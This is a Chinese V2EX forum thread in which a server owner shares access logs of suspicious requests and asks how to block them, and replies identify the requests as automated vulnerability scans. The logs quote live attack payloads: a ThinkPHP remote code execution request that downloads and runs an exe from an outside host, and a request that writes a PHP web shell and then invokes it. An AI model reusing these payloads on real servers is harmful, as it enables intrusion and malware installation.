V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
xwbz2018
V2EX  ›  服务器

请问一下服务器上老有奇怪的请求,怎么屏蔽

  •  
  •   xwbz2018 · 2019-10-21 10:54:10 +08:00 · 4715 次点击
    这是一个创建于 1895 天前的主题,其中的信息可能已经有所发展或是发生改变。
    46.246.62.176 - - [12/Oct/2019:01:40:24 +0800] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 97
    47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97
    47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20$action%20=%20$_GET['xcmd'];system($action);?^>>hydra.php HTTP/1.1" 404 97
    47.100.45.68 - - [12/Oct/2019:04:15:51 +0800] "GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fky.dfg45dfg45.best/download.exe','%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe');start%20%SystemRoot%/Temp/mfzycvublfyyyrr32698.exe HTTP/1.1" 404 97
    106.75.109.223 - - [12/Oct/2019:13:12:21 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97
    106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97
    106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97
    106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /elrekt.php HTTP/1.1" 404 97
    106.75.109.223 - - [12/Oct/2019:13:12:22 +0800] "GET /index.php HTTP/1.1" 404 97
    139.162.88.63 - - [12/Oct/2019:18:06:31 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97
    106.14.152.42 - - [12/Oct/2019:19:33:47 +0800] "HEAD /phpinfo.php HTTP/1.1" 404 -
    139.162.88.63 - - [12/Oct/2019:19:39:00 +0800] "GET /echo.php?info=1234567890 HTTP/1.1" 404 97
    222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/public/index.php HTTP/1.1" 404 97
    222.186.130.42 - - [12/Oct/2019:22:40:39 +0800] "GET /TP/index.php HTTP/1.1" 404 97
    222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 97
    222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /html/public/index.php HTTP/1.1" 404 97
    222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /public/index.php HTTP/1.1" 404 97
    222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /TP/html/public/index.php HTTP/1.1" 404 97
    222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /elrekt.php HTTP/1.1" 404 97
    222.186.130.42 - - [12/Oct/2019:22:40:40 +0800] "GET /index.php HTTP/1.1" 404 97
    
    6 条回复    2019-10-21 14:21:38 +08:00
    lx0758
        1
    lx0758  
       2019-10-21 13:59:45 +08:00
    很明显,这是想扫描你的漏洞
    Vegetable
        2
    Vegetable  
       2019-10-21 14:02:15 +08:00
    这是热心人士在帮你进行服务器漏洞检查,一旦发现漏洞会通过黑掉你进行提醒.没什么特别好的办法屏蔽吧,我都是无视.
    eason1874
        3
    eason1874  
       2019-10-21 14:05:54 +08:00
    挂马机的日常操作,扫描各种 CMS 和框架已经披露的漏洞。

    教你个简单粗暴的方法,如果确定整站没有.php,.asp,.jsp 这些结尾的网址,那就直接把这些结尾的访问全部拒了。如果有呢,那用户访问先插 cookie 校验过 cookie 再允许访问,这样可以解决大部分,因为这种机器大多不会存 cookie 的。
    xwbz2018
        4
    xwbz2018  
    OP
       2019-10-21 14:10:48 +08:00
    @lx0758 嗯,看出来是想搞事情,服务器是 Linux + Java,不会影响正常使用。。不过请问这种一般怎么处理的呢?
    xwbz2018
        5
    xwbz2018  
    OP
       2019-10-21 14:16:03 +08:00
    @Vegetable 热心人士检查几年了。。服务器是 Linux + Java,倒是没多大影响,我就想这些 IP 是不是真实的 IP,然后来一波举报
    xwbz2018
        6
    xwbz2018  
    OP
       2019-10-21 14:21:38 +08:00
    @eason1874 #3 谢谢,除了网页资源,其他后缀都重写了。我这返回 404,应该和拒绝效果差不多吧。

    以前有些爬虫,加了 robots.txt 少了些。

    服务器是无状态的,不太好加 cookie 额
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1299 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 17:57 · PVG 01:57 · LAX 09:57 · JFK 12:57
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.